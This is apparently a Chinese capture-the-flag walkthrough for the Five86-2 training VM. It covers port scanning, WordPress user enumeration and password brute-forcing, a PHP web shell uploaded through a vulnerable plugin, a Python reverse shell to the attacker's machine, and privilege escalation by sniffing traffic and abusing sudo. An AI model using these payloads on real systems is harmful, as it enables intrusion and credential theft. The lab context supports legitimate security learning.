Five86-2靶机

目录

扫描发现 IP 并扫描其端口

---

扫描发现 IP 并扫描其端口

nmap -sP 10.9.23.0/24

sP参数也是只进行主机发现，不进行端口扫描。结果与sn参数相同，但是sP参数只进行ping扫描，而sn会发送四种不同类型的数据包来探测目标主机是否在线，只要收到其中一个包的回复，那就证明目标机开启。

sP扫描可以轻易的获取目标信息而又不被轻易发现。在默认的情况下Nmap会发送一个ICMP回声请求和一个TCP报文到目标端口。ping扫描的优点是不会返回太多的信息造成对结果的分析，并且这是一种非常高效的扫描方式。简而言之，sP扫描到的机器一定存在，那么可以用来确定网段。

如果出现sP扫描完全没有任何结果，但是确认存在某网段，那么该网络一定配置了禁ping的安全设备。

扫描其端口👇

nmap -sV -A -p- 10.9.23.12

-sV 代表扫描主要的服务信息

-A 代表综合性扫描，能收集很多重要的信息

-p- 参数p是指定端口，后面的 - 代表所有端口

开放了20 21 80端口

发现相关信息

扫描出来的80端口 是关于wordpres

访问这个 IP

1. 敏感目录扫描

输入👇

dirb http://10.9.23.12

扫描出来的这个 wp-admin 是属于wordpress的登录后台  然后进行访问

访问wordpress的后台 进行了跳转 无法访问

2. 编辑 hosts 文件

这里无法访问网站的原因是DNS服务器无法解析这个域名，所以我们需要修改hosts文件内容，使域名 Five86-2 对应IP 10.9.23.12

👇

vim /etc/hosts

添加进去 保存退出

保存后 重新进入wordpress登录后台

成功进入

3. wpscan 枚举以及爆破

因为是wordpress 可以使用wpscan这个工具对他进行扫描或爆破

WPScan（WordPress Security Scanner）是一个用于扫描WordPress网站的开源安全工具。它主要用于检测WordPress网站上的安全漏洞和弱点，以帮助管理员加强网站的安全性。

WPScan 主要功能包括：

1. 漏洞扫描： WPScan 可以检测WordPress核心、主题和插件的已知漏洞。

2. 弱密码检测：它能够进行弱密码攻击，尝试使用常见的用户名和密码组合来登录WordPress账户。

3. 用户和插件信息收集：WPScan 可以收集关于WordPress网站上的用户和已安装插件的信息。

4. 目录和文件枚举：它可以枚举目标网站上的目录和文件，帮助发现潜在的敏感信息。

可以输入👇 对这个网页上的用户进行枚举

wpscan --url 10.9.23.12 -e u

-e u： 的含义是启用用户（User）模块，用于扫描和收集有关WordPress网站用户的信息。

具体而言，-e u 表示执行用户模块，这将允许WPScan尝试收集有关目标WordPress网站的用户信息，包括用户名称、角色和其他相关信息。这对于进行安全性评估和发现潜在的安全风险非常有用。

扫描出来有五个用户登录过

将这五个用户名复制粘贴到一个新的txt文档 制作一个users.txt 用户字典

kali有一个自带的密码字典 rockyou.txt

这个文件在kali中的存储路径为👇

/usr/share/wordlists/rockyou.txt.gz

在kali中这个文件是一个压缩文件

可以输入👇 对这个文件进行解压缩

gzip -d /usr/share/wordlists/rockyou.txt.gz

解压缩后 获得密码字典

这时候使用wpscan进行密码爆破

输入👇

wpscan --url 10.9.23.12 -U users.txt -P rockyou.txt

-U：引用用户字典        -u：引用单个用户名

-P：引用密码字典        -p：引用单个密码

破解时间比较长

最后破解出来的用户名对应密码

账密：barney | spooky1              stephen | apollo1

4. 登录 barney wp

发现可以看到这个站点安装了三个插件，但是只激活了一个Insert or Embed Articulate Content into WordPress Trial（IEAC）

进行百度搜索 相关漏洞

insert or embed articulate content爆出远程代码执行漏洞，在登陆网站后可通过zip压缩文件上传php后门

5. 上传反弹 shell

这时候可以创建一个php文件 压缩后上传 再进行反弹

创建一个空文件 命名为 index.php

将以下代码复制粘贴 放进这个文件

<?php echo system($_GET['cmd']); ?>

再输入👇 进行压缩 压缩后名字为123.zip

zip 123.zip index.php

这时候返回网页

点击posts 再点击add new

然后点击这个➕号 然后选择e-learning

点击upload

选择准备上传的文件

将刚刚的压缩文件上传

上传

显示这条信息 虽然上传成功 但是查不到上传路径 需要html 文件

这时候再创建一个index.html文件👇 双引号内随意写

echo "hello" index.html

重新将这个html和php文件一起压缩👇

zip lyy.zip index.html index.php

再重新上传 根据上述步骤

上传完成后 点击 INSERT

看到了上传文件的位置

将路径复制粘贴到10.9.23.12后 访问

显示了 在index.html中写入的文字

可以尝试将html修改为php 然后尝试用cmd命令

cmd成功写入

这时候将反弹脚本写在cmd后面👇

cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("kali的IP",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

其中的IP地址 填写kali的IP👆 

返回 kali 开启 nc 监听

返回网页进行访问

kali 成功进入

6. 提权

进入之后切换到home目录

发现了这些用户

可以尝试切换到刚刚爆破出来的用户

切换到刚刚的barney 显示密码错误

再尝试切换到另一个 stephen

成功切换到stephen

输入👇  交互方式完善

python3 -c 'import pty;pty.spawn("/bin/bash")'

查看当前用户 ID    stephen在一个名为pcap的用户组中

pcap：这个抓包库给抓包系统提供了一个高层次的接口。所有网络上的数据包，甚至是那些发送给其他主机的，通过这种机制，都是可以捕获的。它也支持把捕获的数据包保存为本地文件和从本地文件读取信息。

输入👇 可以查询目前运行着几个网络接口

ip add

这时候可以使用 tcpdump这个命令

tcpdump ：是linux环境下抓包工具，可以对对应网络接口流量进行抓取或者过滤抓取，可以打印输出到屏幕，也可以保存到指定文件。指定的文件可以用wireshark来打开查看。可以快速查看符合网络接口符合某一条件的抓包，方便我们确定网络问题。

输入👇 列出可用于抓包的接口

tcpdump -D

选择把这两个抓下来

这时候 在输入👇

我们这里要加上timeou60 也就是超时时间为60秒，否则会一直抓

timeout 60 tcpdump -w 1.pcap -i vethaab3c6d
timeout 60 tcpdump -w 2.pcap -i br-eca3858d86bf

# 其中 timeout 60 是指一分钟 以秒为单位   自定义时间 
# -w 将结果输出到文件
# -i 指定监听的端口

当前目录显示没权限（permission denied）

所以 cd 进入到当前用户的主目录

输入👇 去分析一下这两个流量包

tcpdump -r 1.pcap
tcpdump -r 2.pcap

# -r 从给定的流量包读取数据

从抓到的流量包中 查看到了 paul的密码 进行信息收集

抓到的两个流量包 信息相同

这时候切换到paul 用户

输入sudo -l 查看是否有其他权限

输入👇 用相对目录找到/bin/bash的位置

sudo -u peter service ../../bin/bash

再输入 sudo -l 查看peter当前的权限

peter 无需密码 可以使用 sudo 使用root 所有命令

修改 root 密码   然后切换到 root 用户

最后找到flag